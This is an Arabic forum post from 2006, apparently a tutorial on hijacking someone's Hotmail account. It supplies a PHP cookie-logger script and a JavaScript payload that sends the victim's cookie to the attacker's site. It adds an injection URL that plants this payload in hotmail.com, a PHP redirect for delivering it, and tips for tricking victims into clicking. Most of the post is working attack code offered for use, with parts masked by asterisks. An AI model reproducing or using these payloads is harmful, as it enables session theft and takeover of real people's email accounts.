الموضوع: ازاى تخترق اميل اى واحد
عرض مشاركة واحدة
  #2  
قديم 10-05-2006, 04:05 AM
الصورة الرمزية Xx.Youri.xX
Xx.Youri.xX Xx.Youri.xX غير متواجد حالياً
عضو قدوة
  
تاريخ التسجيل: Jul 2005
العمر: 18
المشاركات: 1,536
معدل تقييم المستوى: 0
Xx.Youri.xX is an unknown quantity at this point
افتراضي
اه

الطريقه التانيه


مالهاش لازمه دى طريقه متعبه


انتوا حررين


احنا عايزين الاول نعمل صفحه تعمل لوج للنصوص .

كود صفحه php بيعمل لوج لاى تكيست.

كود:
<?php
 *$filename = "logfile.txt";
 *if (isset($_GET["cookie"]))
 *{
 * *if (!$handle = fopen($filename, 'a'))
 * *{
 * * *echo "Error: Unable to write to the log file";
 * * *exit;
 * *}
 * *else
 * *{
 * * *if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
 * * *{
 * * * *echo "Error while writing to log file";
 * * * *exit;
 * * *}
 * *}
 * *echo "Successfully wrote a string to the log file";
 * *fclose($handle);
 * *exit;
 *}
 *echo "nothing to write to the log file";
 *exit;
?>
الكود واضح ومش محتاج شرح على ما اظن

نفترض انه انت رفعته على موقعك مثلا اللينك كده

http://www.xxxxx.com/cookie_logger.php

ادخل هنا مثلا

http://www.xxxxx.com/cookie_logger.php?cookie=Youri

هتظهر لك رساله بتقول

Successfully wrote a string to the log file

وده معناه الملف شغال.

ادخل على ملف اللوج فايل هتلاقى اسمى منور هناك


هههههههههه

بس كده برده احنا معملناش حاجه


لسه محتاجين الضحيه يدخل على الصفحه دى

ازاى .

كود:
<script>location.href='http://www.xxxxx.com/cookie_logger.php?cookie='+escape(****************)</SCRIPT>
ده الاسكربت مفيش ابسط من كده .

احنا كده عايزين نعمل html injection

هيبقى بالاستيل ده

كود:
http://hotmail.com/?mkt=nl-nl');location.href='http://www.xxxxxx.com/cookie_logger.php?cookie='+escape(****************);escape('

بس كده ابعته للضحيه اللى انت عايزها


لكن الضحيه هيشوف اللينك فيه cookie هيخاف وهيعمل عبيط ومش هيضغط


لا احنا نخليه يضغط بالعافيه

ازاى.


ممكن كود تحويل حلو فى اى صفحه وتبعته عليها

او مثلا افتح الصفحه دى مع اى صفحه تبعك ك popup

ان شاله ميكون عنده بوب اب بلوكر

الكود للتحويل مثلا هيبقى كده
كود:
<?php
 *header("Location: http://hotmail.com/?mkt=nl-nl');location.href='http://www.xxxxxx.com/cookie_logger.php?cookie='+escape(****************);escape('");
 *exit;
?>

انا شرحت كل حاجه

الطريقه

الاستغلال

كيفيه الخداع

ده حتى انا كتبتلكم كل الاكواد

يعنى مش ناقص عليا حاجه غير ان انا اللى اخترق لكم الضحيه كمان


بالهنا والشفا


سلام


الشكر مش ليا

الشكر ل masmido

لانه هوه اللى فركنى بالموضوع ده فى سؤاله للعقرب هنا

http://www.thanwya.com/forums/index....pic=5109&st=20

شكرا ليكم

سلام واى استفسار انا موجود


Y O U R I
__________________
Nobody gets too much heaven no more, itz much harder to come by
Nobody gets too much love no more, But I
..:: ^^ Youri <33's Jaleesz ^^ ::..
* quote from Dusty * Like jaleesz is a lovely dovey stuffs, isnt she